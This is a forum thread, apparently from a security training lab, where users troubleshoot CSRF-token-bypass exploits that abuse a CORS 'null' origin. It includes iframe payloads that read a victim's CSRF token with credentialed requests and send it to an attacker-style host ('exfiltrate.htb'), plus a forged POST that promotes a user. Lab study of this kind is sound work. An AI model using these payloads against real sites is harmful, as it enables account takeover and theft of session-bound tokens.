Hi
The challenge for the section whenever an Origin is set the server returns Access-Allow-Origin: null so I used iframes. However the browser is refusing to send cookies because they are third party.
Any help?
Hi, I have been using Burp Suite’s built-in web browser and have not had any problems. I got the flag. For the following section “Misc CSRF Exploitation” I recommend using Firefox to view the flag.
Which version? All “modern” browsers seems to take issue.
Burp Suite 2023.10.3.5. I am using an old kali. What error do you get? If not, write privately
Hi @Ezi0 ,
I run this script on the Burp Suite’s built-in web browse but when I test, I see that it cannot run on.
Can you give me the recommendation, thank you.
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
Hello my friend
<iframe sandbox="allow-scripts allow-top-navigation allow-forms allow-same-origin" srcdoc="<script>
// GET CSRF token
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://vulnerablesite.htb:54844/profile.php', false);
xhr.withCredentials = true;
xhr.onload = () => {
// parse the response
var doc = new DOMParser().parseFromString(xhr.response, 'text/html');
// exfiltrate only the interesting element
var msg = encodeURIComponent(doc.getElementById('csrf').innerHTML);
location = 'https://exfiltrate.htb:54844/log?data=' + btoa(msg);
};
xhr.send();
">
Hi @nn.long, I used the payload listed in the section “Bypassing CSRF Tokens via CORS Misconfigurations” and made only two modifications. Do you really need the xhr.onload? You also need to correctly identify the id that references the token and thus add the correct id in the “doc.getElementById(‘id_correct’)”
Hi @Ezi0 ,
I tried fix and get id like your recommend but nothing happened, when reload the page, i don’t see the promotion of the user.
My script here.
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
Hello my friend
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="<script>
// GET CSRF token
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://vulnerablesite.htb:56437/profile.php', false);
xhr.withCredentials = true;
xhr.send();
var doc = new DOMParser().parseFromString(xhr.responseText, 'text/html');
var csrftoken = encodeURIComponent(doc.getElementById('csrf_token').value);
// do CSRF
var csrf_req = new XMLHttpRequest();
var params = `promote=htb-stdnt&csrf_token=${csrftoken}`;
csrf_req.open('POST', 'https://vulnerablesite.htb:56437/profile.php', false);
csrf_req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
csrf_req.withCredentials = true;
csrf_req.send(params);
</script>"></iframe>
Exact same problem here.
I saved the exploit in localhost and added in burp mach and replace ‘Origin: null’ to ensure the header is changed and even running the script from console I see this errors:
Access to XMLHttpRequest at 'https://bypassing-csrftokens.htb/profile.php' from origin 'http://127.0.0.1' has been blocked by CORS policy: The 'Access-Control-Allow-Origin' header has a value 'null' that is not equal to the supplied origin.
(anónimo) @ VM39:4
Uncaught NetworkError: Failed to execute 'send' on 'XMLHttpRequest': Failed to load 'https://bypassing-csrftokens.htb/profile.php'.
And in burp I see that the GET request is made, so is the browser in fact blocking it